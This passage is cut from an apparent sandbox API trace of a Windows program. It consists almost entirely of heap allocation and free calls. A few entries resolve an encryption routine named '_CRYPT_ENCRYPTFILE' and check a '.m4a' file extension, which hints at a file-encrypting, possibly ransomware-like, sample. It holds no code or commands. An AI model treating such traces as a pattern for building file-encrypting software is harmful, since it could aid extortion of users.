hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0037.817] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.817] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0037.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.818] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.820] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.820] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.821] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.822] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x130) returned 0x7c5448 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 